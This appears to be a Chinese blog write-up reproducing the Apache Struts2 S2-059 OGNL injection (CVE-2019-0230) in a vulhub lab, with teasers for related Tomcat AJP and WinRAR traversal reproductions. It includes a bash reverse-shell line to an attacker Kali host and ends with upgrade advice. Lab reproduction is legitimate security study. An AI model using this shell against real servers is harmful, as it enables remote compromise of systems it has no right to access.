apache struts框架, 會對某些特定的標籤的屬性值,比如id屬性進行二次解析,所以攻擊者可以傳遞將在呈現標籤屬性時再次解析的ognl表示式,造成ognl表示式注入。從而可能造成遠端執行**。
struts 2.0.0 - struts 2.5.20
用vulhub搭建即可
docker-compos up -d
不會的看這
環境完成
正常訪問
然後f12 可以看到html裡三乘以三被執行,也就是3*3被解析到id屬性中了。
接下來**shell:
bash -i >& /dev/tcp/kali的ip/埠 0>&1
需要編碼
更新struts2位最新版本
s2 059漏洞復現 CVE 2019 0230
2020年8月13日,apache官方發布了一則公告,該公告稱apache struts2使用某些標籤時,會對標籤屬性值進行二次表示式解析,當標籤屬性值使用了 並且skillname的值使用者可以控制,就會造成ognl表示式執行。1.docker vulhub漏洞庫 3.攻擊機kali虛擬機器 版本...
漏洞復現 CVE 2020 1938漏洞復現
tomcat connector 是 tomcat 與外界連線的通道,使得它與 catalina 能夠接收外部的請求,傳遞給對應的 web 應用程式處理,並返回對應的請求結果。http connector就是用來提供經常用到的http web服務,而ajp connector使用的ajp協議 apa...
漏洞復現 Winrar目錄穿越漏洞復現
該漏洞是由於 winrar 所使用的乙個陳舊的動態鏈結庫unacev2.dll所造成的,該動態鏈結庫在 2006 年被編譯,沒有任何的基礎保護機制 aslr,dep 等 動態鏈結庫的作用是處理 ace 格式檔案。而winrar解壓ace檔案時,由於沒有對檔名進行充分過濾,導致其可實現目錄穿越,將惡意...